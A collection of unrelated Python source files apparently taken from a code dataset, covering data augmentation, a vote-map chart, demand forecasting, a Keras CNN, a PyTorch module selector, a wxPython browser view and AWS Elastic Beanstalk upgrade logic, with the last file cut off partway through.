_UNIVERSALDIFF.fields_by_name['transactions'].message_type = v3_dot_diff_dot_Transaction__pb2._TRANSACTION
DESCRIPTOR.message_types_by_name['UniversalDiff'] = _UNIVERSALDIFF
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
UniversalDiff = _reflection.GeneratedProtocolMessageType('UniversalDiff', (_message.Message,), dict(
DESCRIPTOR = _UNIVERSALDIFF,
__module__ = 'v3.diff.UniversalDiff_pb2'
# @@protoc_insertion_point(class_scope:v3.diff.UniversalDiff)
))
_sym_db.RegisterMessage(UniversalDiff)
# @@protoc_insertion_point(module_scope)
| 1.257813 | 1 |
src/onevision/data/augment/image_box_augment.py | phlong3105/onevision | 2 | 10892 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from __future__ import annotations
import numpy as np
import torch
from torch import Tensor
from onevision.data.augment.base import BaseAugment
from onevision.data.augment.utils import apply_transform_op
from onevision.data.data_class import ObjectAnnotation
from onevision.factory import AUGMENTS
__all__ = [
"ImageBoxAugment",
]
# MARK: - Modules
@AUGMENTS.register(name="image_box_augment")
class ImageBoxAugment(BaseAugment):
r"""
Args:
policy (str):
Augmentation policy. One of: [`scratch`, `finetune`].
Default: `scratch`.
"""
cfgs = {
"scratch": [
# (op_name, p, magnitude)
(("image_box_random_perspective", 0.5, (0.0, 0.5, 0.5, 0.0, 0.0)),
("adjust_hsv", 0.5, (0.015, 0.7, 0.4)),
("hflip_image_box", 0.5, None),
("vflip_image_box", 0.5, None),),
],
"finetune": [
(("image_box_random_perspective", 0.5, (0.0, 0.5, 0.8, 0.0, 0.0)),
("adjust_hsv", 0.5, (0.015, 0.7, 0.4)),
("hflip_image_box", 0.5, None),
("vflip_image_box", 0.5, None),),
],
}
# MARK: Magic Functions
def __init__(self, policy: str = "scratch", *args, **kwargs):
super().__init__(*args, **kwargs)
if policy not in self.cfgs:
raise ValueError(f"`policy` must be one of: {self.cfgs.keys()}."
f" But got: {policy}")
self.transforms = self.cfgs[policy]
def __repr__(self) -> str:
return self.__class__.__name__ + \
f"(policy={self.policy}, fill={self.fill})"
# MARK: Configure
def _augmentation_space(self, *args, **kwargs) -> dict[str, tuple[Tensor, bool]]:
pass
# MARK: Forward Pass
def forward(self, input: np.ndarray, target: np.ndarray) -> tuple[np.ndarray, np.ndarray]:
"""
Args:
input (np.ndarray):
Image to be transformed.
target (np.ndarray[*, 4):
Target to be transformed. Boxes in (x, y, x, y) format.
"""
# NOTE: Transform
transform_id = int(torch.randint(len(self.transforms), (1,)).item())
num_ops = len(self.transforms[transform_id])
probs = torch.rand((num_ops,))
for i, (op_name, p, magnitude) in enumerate(self.transforms[transform_id]):
if probs[i] > p:
continue
magnitude = magnitude if magnitude is not None else 0.0
if op_name == "image_box_random_perspective":
"""
target[:, 2:6] = box_cxcywh_norm_to_xyxy(
target[:, 2:6], input.shape[0], input.shape[1]
)
"""
input, target = apply_transform_op(
input = input,
target = target,
op_name = op_name,
magnitude = magnitude,
interpolation = self.interpolation,
fill = self.fill
)
nl = len(target) # Number of labels
if nl:
target = target
else:
target = np.zeros((nl, ObjectAnnotation.box_label_len()))
"""
target[:, 2:6] = box_xyxy_to_cxcywh_norm(
target[:, 2:6], input.shape[0], input.shape[1]
)
"""
else:
input, target = apply_transform_op(
input = input,
target = target,
op_name = op_name,
magnitude = magnitude,
interpolation = self.interpolation,
fill = self.fill
)
'''
elif op_name == "adjust_hsv":
input = adjust_hsv(
input,
h_factor = magnitude[0],
s_factor = magnitude[1],
v_factor = magnitude[2],
)
elif op_name == "hflip":
input = np.fliplr(input)
target[:, 2] = 1 - target[:, 2]
elif op_name == "vflip":
input = np.flipud(input)
target[:, 3] = 1 - target[:, 3]
'''
return input, target
| 1.945313 | 2 |
dataviz/euvotes.py | Udzu/pudzu | 119 | 10893 | from pudzu.charts import *
from pudzu.sandbox.bamboo import *
import seaborn as sns
# generate map
df = pd.read_csv("datasets/euvotes.csv").set_index('country')
palette = tmap(RGBA, sns.cubehelix_palette(11, start=0.2, rot=-0.75))
ranges = [20000000,10000000,5000000,2000000,1000000,500000,200000,100000,0]
def votecolfn(n):
return palette[8 - next(i for i,x in enumerate(ranges) if n >= x)]
def colorfn(c):
if c not in df.index:
return "white" if c in ['Sea', 'Borders'] else "grey"
return votecolfn(int(df.loc[c].votes))
def labelfn(c):
if c not in df.index: return None
dfc = df.loc[c]
label = "{name} '{year}\n({votes:.2g}M)".format(name=dfc.leader.split(" ")[-1], year=dfc.year[2:], votes=int(dfc.votes) / 1000000)
return Image.from_text(label, arial(14, bold=True), align="center", padding=2)
map = map_chart("maps/Europe.png", colorfn, labelfn)
# legend
def box(c):
return Image.new("RGBA", (30, 30), c).place(Image.from_text("", arial(16, bold=True), "black", bg=c))
vote_arr = Image.from_array([
[box(votecolfn(n)), Image.from_text("<0.1M" if n < 100000 else ">{:.2g}M".format(n/1000000), arial(16), padding=(10,0))] for n in ranges
], bg="white", xalign=0)
vote_leg = Image.from_column([Image.from_text("# votes", arial(16, bold=True)), vote_arr], bg="white", xalign=0, padding=(0,5))
note_leg = Image.from_text("Multi-party national elections for executive head or party.", arial(16), max_width=100, bg="white", padding=(0,2))
legend = Image.from_column([vote_leg, note_leg], bg="white", xalign=0, padding=5).pad(1, "black")
chart = map.place(legend, align=(1,0), padding=10)
title = Image.from_column([
Image.from_text("EUROPEAN POPULAR VOTE RECORDS", arial(48, bold=True)),
Image.from_text("candidate or party with the highest absolute popular vote", arial(36))],
bg="white")
img = Image.from_column([title, chart], bg="white", padding=2)
img.place(Image.from_text("/u/Udzu", font("arial", 16), fg="black", bg="white", padding=5).pad((1,1,0,0), "black"), align=1, padding=10, copy=False)
img.save("output/euvotes.png")
| 2.578125 | 3 |
WarmUpSTE.py | jrolf/jse-api | 1 | 10894 |
import pandas as pd
import numpy as np
from copy import *
from bisect import *
from scipy.optimize import curve_fit
from sklearn.metrics import *
from collections import defaultdict as defd
import datetime,pickle
from DemandHelper import *
import warnings
warnings.filterwarnings("ignore")
#################################################################
#################################################################
#################################################################
class DemandForecastModel:
def __init__(self,rank_model='',forecast='',rmodel_beta=1.0,final_beta=1.0):
if rank_model != '':
self.ingest(rank_model,forecast,rmodel_beta,final_beta)
def ingest(self,rank_model,forecast,rmodel_beta=1.0,final_beta=1.0):
self.rank_model = rank_model
self.rmodel_beta = rmodel_beta
self.forecast = forecast
self.final_beta = final_beta
self.alldates = sorted(forecast.index)
def predict(self,rank=10000,date='2018-07-04',buybox=100):
if 'str' not in str(type(date)): date = str(date)[:10]
pred1 = self.rank_model.predict([rank])[0]
pred2 = pred1*self.rmodel_beta
d = self.forecast.loc[date]
mid,lo,hi = d['yhat'],d['yhat_lower'],d['yhat_upper']
rdr_preds = np.array([lo,mid,hi])
pred3 = pred2*rdr_preds
pred4 = pred3*self.final_beta
pred5 = global2local(pred4,buybox)
return pred5
#################################################################
#################################################################
# Export a fitted model to text file:
# These filenames normally end in '.pkl'
def ExportModel(filename,model_object):
pickle.dump(model_object, open(filename, 'wb'))
print('Model Saved TO: '+filename)
# Import a fitted model from text file:
# These filenames normally end in '.pkl'
def ImportModel(filename):
model_object = pickle.load(open(filename, 'rb'))
print('Model Imported FROM: '+filename)
return model_object
def GetToday():
today = datetime.datetime.today()
return str(today)[:10]
#################################################################
#################################################################
#################################################################
short2long = {
'H&G' : 'Home & Garden',
'L&G' : 'Lawn & Garden',
'SPORTS' : 'Sports & Outdoors',
'HI' : 'Home Improvement',
'TOY' : 'Toys & Games',
'KIT' : 'Home & Kitchen',
}
long2short = {}
for short in sorted(short2long):
long2short[short2long[short]] = short
Shorts = sorted(short2long)
Longs = sorted(long2short)
def ConvertToShort(thing):
if thing in long2short: return long2short[thing]
return thing
Models2 = {}
for SH in Shorts:
fn = 'MODELS/'+SH+'/DFM2.pkl'
model = ImportModel(fn)
Models2[SH] = model
AllDates = sorted(set([str(a)[:10] for a in Models2['H&G'].alldates]))
#################################################################
#################################################################
# Returns a list of valid category names:
def GetCategories2():
return sorted(long2short)
# SPREETAIL DEMAND PREDICTION:
# cat : Category (String or List)
# rank : Sales Rank (Integer, 2-List, Long-List)
# date1 : First Date of Forecast ("2018-09-03")
# date2 : Final Date of Forecast OR # Days Forward ("2018-10-03" or 30)
# bb_ratio : BuyBox Percent (100.0)
# md_ratio : Marketplace Distribution Percent
def SpreetailPredict(cat,rank,date1='today',date2=30,bb_ratio=1.0,md_ratio=0.62):
if (not date1) or (str(date1).lower()=='today'): date1 = GetToday()
index1 = bisect_left(AllDates,date1)
if len(str(date2)) >10: date2 = str(date2)[:10]
if len(str(date2))==10: index2 = bisect_left(AllDates,date2)
else: index2 = index1+int(date2)
index_dif = abs(index2-index1)
index1 = min([index1,index2])
index2 = index1+index_dif
DateRange = AllDates[index1:index2+1]
LEN = len(DateRange)
#--------------------------------------
tdf = pd.DataFrame()
tdf['DATE'] = DateRange
#--------------------------------------
if 'list' in str(type(cat)):
cat = [ConvertToShort(a) for a in cat]
if len(cat)==LEN: tdf['CAT'] = cat
else: tdf['CAT'] = cat[0]
else: tdf['CAT'] = ConvertToShort(cat)
#--------------------------------------
if 'list' in str(type(rank)):
if len(rank)==LEN: tdf['RANK'] = rank
elif len(rank)==2:
r1,r2 = tuple(rank)
tdf['RANK'] = np.linspace(r1,r2,LEN)
else: tdf['RANK'] = rank[0]
else: tdf['RANK'] = rank
#--------------------------------------
md_ratio2 = max(0.3,min(md_ratio,0.99))
other_ratio = (1.0-md_ratio2)/md_ratio2
tdf['BBR'] = bb_ratio
tdf['MDR'] = md_ratio2
#--------------------------------------
M = tdf.values
results = []
for row in M:
d,c,r = tuple(row[:3])
pred_100 = Models2[c].predict(r,d,100.0)
pred_bbr = Models2[c].predict(r,d,100.0*bb_ratio)
results.append([pred_100,pred_bbr])
tdf['P_100'] = [r[0][1] for r in results]
tdf['P_100_HI'] = [r[0][2] for r in results]
tdf['P_100_LO'] = [r[0][0] for r in results]
tdf['P_BBR'] = [r[1][1] for r in results]
tdf['P_BBR_HI'] = [r[1][2] for r in results]
tdf['P_BBR_LO'] = [r[1][0] for r in results]
tdf['P_OTH'] = other_ratio * tdf['P_100']
tdf['P_OTH_HI'] = other_ratio * tdf['P_100_HI']
tdf['P_OTH_LO'] = other_ratio * tdf['P_100_LO']
tdf['P_TOT'] = tdf['P_BBR'] +tdf['P_OTH']
tdf['P_TOT_HI'] = tdf['P_BBR_HI']+tdf['P_OTH_HI']
tdf['P_TOT_LO'] = tdf['P_BBR_LO']+tdf['P_OTH_LO']
cols = list(tdf.columns)[5:]
for col in cols:
col2 = col+'_C'
tdf[col2] = np.cumsum(tdf[col])
Matrix = [list(tdf.columns)]
for row in tdf.values:
Matrix.append(list(row))
MainPred = list(tdf['P_TOT_C'])[-1]
return [MainPred,Matrix]
def SpreePred(cat,rank,date1='today',date2=30,bb_ratio=1.0,md_ratio=0.62):
result = SpreetailPredict(cat,rank,date1,date2,bb_ratio,md_ratio)
M = result[1]
cols,m = M[0],M[1:]
return pd.DataFrame(m,columns=cols)
#################################################################
#################################################################
# [END]
| 2.359375 | 2 |
Section 3/cnn3.py | PacktPublishing/Python-Deep-Learning-for-Beginners- | 7 | 10895 | <gh_stars>1-10
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Flatten
from keras.layers import Conv2D, MaxPooling2D
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=(128, 128, 1)))
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=(128, 128, 1)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(10000, activation='relu'))
model.add(Dense(1000, activation='relu'))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer='sgd')
model.fit(x_train, y_train,
epochs=100,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test)
| 2.84375 | 3 |
k1lib/selector.py | 157239n/k1lib | 1 | 10896 | <filename>k1lib/selector.py
# AUTOGENERATED FILE! PLEASE DON'T EDIT
"""
This module is for selecting a subnetwork using CSS so that you can do special
things to them. Checkout the tutorial section for a walkthrough. This is exposed
automatically with::
from k1lib.imports import *
selector.select # exposed
"""
from torch import nn; import k1lib, re, torch
from typing import List, Tuple, Dict, Union, Any, Iterator, Callable
from contextlib import contextmanager; from functools import partial
__all__ = ["ModuleSelector", "preprocess", "select"]
def preprocess(selectors:str, defaultProp="*") -> List[str]:
r"""Removes all quirkly features allowed by the css
language, and outputs nice lines. Example::
# returns ["a:f", "a:g,h", "b:g,h", "t:*"]
selector.preprocess("a:f; a, b: g,h; t")
:param selectors: single css selector string. Statements separated
by "\\n" or ";"
:param defaultProp: default property, if statement doesn't have one"""
# filtering unwanted characters and quirky spaces
lines = [e for l in selectors.split("\n") for e in l.split(";")]
selectors = [re.sub("(^\s+)|(\s+$)", "", re.sub("\s\s+", " ", line)).replace(" >", ">").replace("> ", ">").replace(" :", ":").replace(": ", ":").replace(" ,", ",").replace(", ", ",").replace(";", "\n").replace(" \n", "\n").replace("\n ", "\n") for line in lines if line != ""]
# adding "*" to all selectors with no props specified
selectors = [selector if ":" in selector else f"{selector}:{defaultProp}" for selector in selectors]
# expanding comma-delimited selectors
return [f"{segment}:{selector.split(':')[1]}" for selector in selectors for segment in selector.split(":")[0].split(",")]
def _getParts(s:str): return [a for elem in s.split(":")[0].split(">") if elem for a in elem.split(" ") if a]
def _getProps(s:str): return [elem for elem in s.split(":")[1].split(",") if elem]
_idxAuto = k1lib.AutoIncrement()
class ModuleSelector: # empty methods so that Sphinx generates the docs in order
props:List[str]
"""Properties of this :class:`ModuleSelector`"""
idx:int
"""Unique id of this :class:`ModuleSelector` in the entire script. May be useful
for module recognition"""
nn:"torch.nn.Module"
"""The associated :class:`torch.nn.Module` of this :class:`ModuleSelector`"""
def __init__(self, parent:"ModuleSelector", name:str, nn:"torch.nn.Module"):
self.parent = parent; self.name = name; self.nn = nn
self._children:Dict["ModuleSelector"] = {}
self.props:List[str] = []; self.depth:int = 0
self.directSelectors:List[str] = []
self.indirectSelectors:List[str] = []
self.displayF:Callable[["ModuleSelector"], str] = lambda mS: ', '.join(mS.props)
self.idx = _idxAuto()
def deepestDepth(self): pass
def highlight(self, prop:str):
"""Highlights the specified prop when displaying the object."""
self.displayF = lambda self: (k1lib.fmt.txt.red if prop in self else k1lib.fmt.txt.identity)(', '.join(self.props))
return self
def __call__(self, *args, **kwargs):
"""Calls the internal :class:`torch.nn.Module`"""
return self.nn(*args, **kwargs)
def __contains__(self): pass
def named_children(self): pass
def children(self): pass
def named_modules(self): pass
def modules(self): pass
def directParams(self): pass
def parse(self): pass
def apply(self): pass
def clearProps(self): pass
@property
def displayF(self):
"""Function to display each ModuleSelector's lines.
Default is just::
lambda mS: ", ".join(mS.props) """
return self._displayF
@displayF.setter
def displayF(self, f):
def applyF(self): self._displayF = f
self.apply(applyF)
def __getattr__(self, attr):
if attr.startswith("_"): raise AttributeError(attr)
if attr in self._children: return self._children[attr]
return self.directParams[attr]
def __getitem__(self, idx): return getattr(self, str(idx))
@staticmethod
def sample() -> "ModuleSelector":
"""Create a new example :class:`ModuleSelector` that has a bit of
hierarchy to them, with no css."""
return nn.Sequential(nn.Linear(3, 4), nn.Sequential(nn.Conv2d(3, 8, 3, 2), nn.ReLU(), nn.Linear(5, 6)), nn.Linear(7, 8)).select("")
def hookF(self): pass
def hookFp(self): pass
def hookB(self): pass
def freeze(self): pass
def unfreeze(self): pass
@k1lib.patch(nn.Module)
def select(model:"torch.nn.Module", css:str="*") -> "k1lib.selector.ModuleSelector":
"""Creates a new ModuleSelector, in sync with a model.
Example::
mS = selector.select(nn.Linear(3, 4), "#root:propA")
Or, you can do it the more direct way::
mS = nn.Linear(3, 4).select("#root:propA")
:param model: the :class:`torch.nn.Module` object to select from
:param css: the css selectors"""
root = ModuleSelector(None, "root", model)
root.parse(preprocess(css)); return root
@k1lib.patch(ModuleSelector, name="apply")
def _apply(self, f:Callable[[ModuleSelector], None]):
"""Applies a function to self and all child :class:`ModuleSelector`"""
f(self)
for child in self._children.values(): child.apply(f)
@k1lib.patch(ModuleSelector, name="parse")
def _parse(self, selectors:Union[List[str], str]) -> ModuleSelector:
"""Parses extra selectors. Clears all old selectors, but retain
the props. Returns self. Example::
mS = selector.ModuleSelector.sample().parse("Conv2d:propA")
# returns True
"propA" in mS[1][0]
:param selectors: can be the preprocessed list, or the unprocessed css string"""
if isinstance(selectors, str): selectors = preprocess(selectors)
self.directSelectors = []; self.indirectSelectors = []
ogSelectors = selectors
if self.parent != None:
selectors = [] + selectors + self.parent.indirectSelectors + self.parent.directSelectors
self.indirectSelectors += self.parent.indirectSelectors
self.depth = self.parent.depth + 1
for selector in selectors:
parts = _getParts(selector)
matches = parts[0] == self.nn.__class__.__name__ or parts[0] == "#" + self.name or parts[0] == "*"
if len(parts) == 1:
if matches: self.props += _getProps(selector)
else:
a = selector.find(">"); a = a if a > 0 else float("inf")
b = selector.find(" "); b = b if b > 0 else float("inf")
direct = a < b
if matches:
if direct: self.directSelectors.append(selector[a+1:])
else: self.indirectSelectors.append(selector[b+1:])
for name, mod in self.nn.named_children():
if name not in self._children:
self._children[name] = ModuleSelector(self, name, mod)
self._children[name].parse(ogSelectors)
self.props = list(set(self.props)); return self
@k1lib.patch(ModuleSelector)
def __contains__(self, prop:str=None) -> bool:
"""Whether this :class:`ModuleSelector` has a specific prop.
Example::
# returns True
"b" in nn.Linear(3, 4).select("*:b")
# returns False
"h" in nn.Linear(3, 4).select("*:b")
# returns True, "*" here means the ModuleSelector has any properties at all
"*" in nn.Linear(3, 4).select("*:b")"""
if "*" in self.props: return True
if prop in self.props: return True
if prop == "*" and len(self.props) > 0: return True
return False
@k1lib.patch(ModuleSelector)
def named_children(self, prop:str=None) -> Iterator[Tuple[str, ModuleSelector]]:
"""Get all named direct childs.
:param prop: Filter property. See also: :meth:`__contains__`"""
if prop is None: return self._children.items()
return ((k, v) for k, v in self._children.items() if prop in v)
@k1lib.patch(ModuleSelector)
def children(self, prop:str=None) -> Iterator[ModuleSelector]:
"""Get all direct childs.
:param prop: Filter property. See also: :meth:`__contains__`"""
return (x for _, x in self.named_children(prop))
@k1lib.patch(ModuleSelector, "directParams")
@property
def directParams(self) -> Dict[str, nn.Parameter]:
"""Dict params directly under this module"""
return {name: param for name, param in self.nn.named_parameters() if "." not in name}
@k1lib.patch(ModuleSelector)
def named_modules(self, prop:str=None) -> Iterator[Tuple[str, ModuleSelector]]:
"""Get all named child recursively.
Example::
modules = list(nn.Sequential(nn.Linear(3, 4), nn.ReLU()).select().named_modules())
# return 3
len(modules)
# return tuple ('0', <ModuleSelector of Linear>)
modules[1]
:param prop: Filter property. See also: :meth:`__contains__`"""
if prop != None:
yield from ((name, m) for name, m in self.named_modules() if prop in m)
return
yield self.name, self
for child in self._children.values(): yield from child.named_modules()
@k1lib.patch(ModuleSelector)
def modules(self, prop:str=None) -> Iterator[ModuleSelector]:
"""Get all child recursively.
:param prop: Filter property. See also: :meth:`__contains__`"""
for name, x in self.named_modules(prop): yield x
@k1lib.patch(ModuleSelector)
def clearProps(self) -> "ModuleSelector":
"""Clears all existing props of this and all descendants
:class:`ModuleSelector`. Example::
# returns False
"b" in nn.Linear(3, 4).select("*:b").clearProps()"""
def applyF(self): self.props = []
self.apply(applyF); return self
@k1lib.patch(ModuleSelector, name="deepestDepth")
@property
def deepestDepth(self):
"""Deepest depth of the tree. If self doesn't
have any child, then depth is 0"""
if len(self._children) == 0: return 0
return 1 + max([child.deepestDepth for child in self._children.values()])
@k1lib.patch(ModuleSelector)
def __repr__(self, intro:bool=True, header:Union[str, Tuple[str]]="", footer="", tabs:int=None):
"""
:param intro: whether to include a nice header and footer info
:param header:
str: include a header that starts where `displayF` will start
Tuple[str, str]: first one in tree, second one in displayF section
:param footer: same thing with header, but at the end
:param header: include a header that starts where `displayF` will start
:param tabs: number of tabs at the beginning. Best to leave this empty
"""
if tabs == None: tabs = 5 + self.deepestDepth
answer = "ModuleSelector:\n" if intro else ""
if header:
h1, h2 = ("", header) if isinstance(header, str) else header
answer += h1.ljust(tabs*4, " ") + h2 + "\n"
answer += f"{self.name}: {self.nn.__class__.__name__}".ljust(tabs*4, " ")
answer += self.displayF(self) + ("\n" if len(self._children) > 0 else "")
answer += k1lib.tab("\n".join([child.__repr__(tabs=tabs-1, intro=False) for name, child in self._children.items()]))
if footer:
f1, f2 = ("", footer) if isinstance(footer, str) else footer
answer += "\n" + f1.ljust(tabs*4, " ") + f2
if intro: answer += f"""\n\nCan...
- mS.deepestDepth: get deepest depth possible
- mS.nn: get the underlying nn.Module object
- mS.apply(f): apply to self and all descendants
- "HookModule" in mS: whether this module has a specified prop
- mS.highlight(prop): highlights all modules with specified prop
- mS.parse([..., ...]): parses extra css
- mS.directParams: get Dict[str, nn.Parameter] that are directly under this module"""
return answer
def _strTensor(t): return "None" if t is None else f"{t.shape}"
def strTensorTuple(ts):
if len(ts) > 1:
shapes = "\n".join(f"- {_strTensor(t)}" for t in ts)
return f"tensors ({len(ts)} total) shapes:\n{shapes}"
else:
return f"tensor shape: {_strTensor(ts[0])}"
@k1lib.patch(ModuleSelector)
@contextmanager
def hookF(self, f:Callable[[ModuleSelector, "torch.nn.Module", Tuple[torch.Tensor], torch.Tensor], None]=None, prop:str="*"):
"""Context manager for applying forward hooks.
Example::
def f(mS, m, i, o):
print(i, o)
m = nn.Linear(3, 4)
with m.select().hookF(f):
m(torch.randn(2, 3))
:param f: hook callback, should accept :class:`ModuleSelector`, inputs and output
:param prop: filter property of module to hook onto. If not specified, then it will print out input and output tensor shapes."""
if f is None: f = lambda mS, i, o: print(f"Forward hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}\nOutput tensor shape: {o.shape}"))
g = lambda m, i, o: f(self, i, o)
handles = [m.nn.register_forward_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
@k1lib.patch(ModuleSelector)
@contextmanager
def hookFp(self, f=None, prop:str="*"):
"""Context manager for applying forward pre hooks.
Example::
def f(mS, m, i):
print(i)
m = nn.Linear(3, 4)
with m.select().hookFp(f):
m(torch.randn(2, 3))
:param f: hook callback, should accept :class:`ModuleSelector` and inputs
:param prop: filter property of module to hook onto. If not specified, then it will print out input tensor shapes."""
if f is None: f = lambda mS, i: print(f"Forward pre hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}"))
g = lambda m, i: f(self, i)
handles = [m.nn.register_forward_pre_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
@k1lib.patch(ModuleSelector)
@contextmanager
def hookB(self, f=None, prop:str="*"):
"""Context manager for applying backward hooks.
Example::
def f(mS, m, i, o):
print(i, o)
m = nn.Linear(3, 4)
with m.select().hookB(f):
m(torch.randn(2, 3)).sum().backward()
:param f: hook callback, should accept :class:`ModuleSelector`, grad inputs and outputs
:param prop: filter property of module to hook onto. If not specified, then it will print out input tensor shapes."""
if f is None: f = lambda mS, i, o: print(f"Backward hook {m}:\n" + k1lib.tab(f"Input {strTensorTuple(i)}\nOutput {strTensorTuple(o)}"))
g = lambda m, i, o: f(self, i, o)
handles = [m.nn.register_full_backward_hook(g) for m in self.modules(prop)]
try: yield
finally:
for h in handles: h.remove()
from contextlib import ExitStack
@contextmanager
def _freeze(self, value:bool, prop:str):
modules = [m for m in self.modules(prop)]
with ExitStack() as stack:
for m in self.modules(prop):
stack.enter_context(m.nn.gradContext())
m.nn.requires_grad_(value)
try: yield
finally: pass
@k1lib.patch(ModuleSelector)
def freeze(self, prop:str="*"):
"""Returns a context manager that freezes (set requires_grad to False) parts of
the network. Example::
l = k1lib.Learner.sample()
w = l.model.lin1.lin.weight.clone() # weights before
with l.model.select("#lin1").freeze():
l.run(1)
# returns True
(l.model.lin1.lin.weight == w).all()"""
return _freeze(self, False, prop)
@k1lib.patch(ModuleSelector)
def unfreeze(self, prop:str="*"):
"""Returns a context manager that unfreezes (set requires_grad to True) parts of
the network. Example::
l = k1lib.Learner.sample()
w = l.model.lin1.lin.weight.clone() # weights before
with l.model.select("#lin1").freeze():
with l.model.select("#lin1 > #lin").unfreeze():
l.run(1)
# returns False
(l.model.lin1.lin.weight == w).all()"""
return _freeze(self, True, prop) | 2.984375 | 3 |
plugins/General/wxRaven_WebBrowser.py | sLiinuX/wxRaven | 11 | 10897 | <reponame>sLiinuX/wxRaven<gh_stars>10-100
'''
Created on 22 févr. 2022
@author: slinux
'''
from .wxRavenGeneralDesign import wxRavenWebBrowser
from wxRavenGUI.application.wxcustom.CustomLoading import *
from wxRavenGUI.application.wxcustom import *
import wx.html2 as webview
import sys
import logging
from wxRavenGUI.application.wxcustom.CustomUserIO import UserAdvancedMessage
class wxRaven_WebBrowserLogic(wxRavenWebBrowser):
'''
classdocs
'''
#
# Datas for the plugin display style
#
#
view_base_name = "WebBrowser"
view_name = "WebBrowser"
parent_frame = None
default_position = "main"
icon = 'internal_browser'#wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
def __init__(self, parentFrame, position = "main", viewName= "WebBrowser", isInternalPluginView=False, url=''):
'''
Constructor
'''
super().__init__(parent=parentFrame)
#
# Your constructor here
#
self.view_base_name = "WebBrowser"
self.view_name = viewName
self.parent_frame = parentFrame
self.default_position = position
self._loadingPanel = None
parentFrame.RessourcesProvider.ApplyThemeOnPanel(self)
#This is to add the view in the appropriate place using the mainapp to do so
#
#The only exception is when the pannel itself is called by the plugin or another view
#In this case the position in main app must not be managed (see rpc command panel as example)
#
if not isInternalPluginView:
parentFrame.Add(self, self.view_name ,position, parentFrame.RessourcesProvider.GetImage(self.icon))
#is_windows = hasattr(sys, 'getwindowsversion')
#if is_windows:
# self.WindowsSetup()
self.wv=wxRavenWebview.GetWebView(self.m_webPan)
'''
is_windows = hasattr(sys, 'getwindowsversion')
if is_windows:
webview.WebView.MSWSetEmulationLevel(webview.WEBVIEWIE_EMU_IE11)
_backend = self.GetAvailableBackend(_windows=True)
if _backend == None:
UserAdvancedMessage(parentFrame, "Unable to find a backend for the webview, \n please verify you do have the webview component or download it (url in details)", "Error", "https://developer.microsoft.com/en-us/microsoft-edge/webview2/", showCancel=False)
self.wv = webview.WebView.New(self, backend=_backend)
else:
self.wv= webview.WebView.New(self)
'''
self.bSizer1 = wx.BoxSizer( wx.VERTICAL )
self.bSizer1.Add( self.wv, 1, wx.ALL|wx.EXPAND, 5 )
self.m_webPan.SetSizer( self.bSizer1 )
self.Layout()
self.m_buttonGo.Bind(wx.EVT_BUTTON,self.GetUrl )
if url == '':
pass
#self.LoadRavencoinIPFS()
else:
self.GetURL(url)
def UpdateView(self, evt=None):
pass
def GetUrl(self, evt):
url = self.m_textCtrlURL.GetValue()
self.wv.LoadURL(url)
def OpenUrl(self, url_text, _writeInAddress=True):
if _writeInAddress:
self.m_textCtrlURL.SetValue(url_text)
self.wv.LoadURL(url_text)
| 1.960938 | 2 |
backend/pollr-eb2/lib/python3.5/site-packages/ebcli/operations/upgradeops.py | saarthak24/Pollr | 2 | 10898 | # Copyright 2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from ebcli.objects.platform import PlatformVersion
from ..resources.strings import prompts
from ..resources.statics import namespaces, option_names
from ..core import io
from ..lib import elasticbeanstalk
from . import commonops
def _get_warning_message(confirm, single, rolling_enabled, webserver, noroll):
if confirm:
return None
elif single:
return prompts['upgrade.singleinstance']
elif not rolling_enabled and noroll:
return prompts['upgrade.norollingforce']
elif not rolling_enabled:
if webserver:
type = 'Health'
else:
type = 'Time'
return prompts['upgrade.norollingapply'].format(type)
elif rolling_enabled:
return prompts['upgrade.rollingupdate']
def _should_add_rolling(single, rolling_enabled, noroll):
if noroll:
return False
if single:
return False
if rolling_enabled:
return False
return True
def upgrade_env(app_name, env_name, timeout, confirm, noroll):
env = elasticbeanstalk.get_environment_settings(app_name, env_name)
latest = commonops.get_latest_solution_stack(env.platform.version)
if latest == env.platform:
io.echo(prompts['upgrade.alreadylatest'])
return
else:
single = elasticbeanstalk.get_option_setting(
env.option_settings, namespaces.ENVIRONMENT,
'EnvironmentType') == 'SingleInstance'
rolling_enabled = elasticbeanstalk.get_option_setting(
env.option_settings, namespaces.ROLLING_UPDATES,
option_names.ROLLING_UPDATE_ENABLED) == 'true'
webserver = env.tier.name.lower() == 'webserver'
io.echo()
io.echo(prompts['upgrade.infodialog'].format(env_name))
io.echo('Current platform:', env.platform)
io.echo('Latest platform: ', latest)
io.echo()
warning = _get_warning_message(confirm, single,
rolling_enabled, webserver, noroll)
if warning:
io.log_warning(warning)
io.echo(prompts['upgrade.altmessage'])
io.echo()
if not confirm:
# Get confirmation
io.validate_action(prompts['upgrade.validate'], env.name)
add_rolling = _should_add_rolling(single, rolling_enabled, noroll)
do_upgrade(env_name, add_rolling, timeout, latest.name,
health_based=webserver, platform_arn = latest.version)
def do_upgrade(env_name, add_rolling, timeout, solution_stack_name,
health_based=False, platform_arn=None):
if add_rolling:
if health_based:
roll_type = 'Health'
else:
roll_type = 'Time'
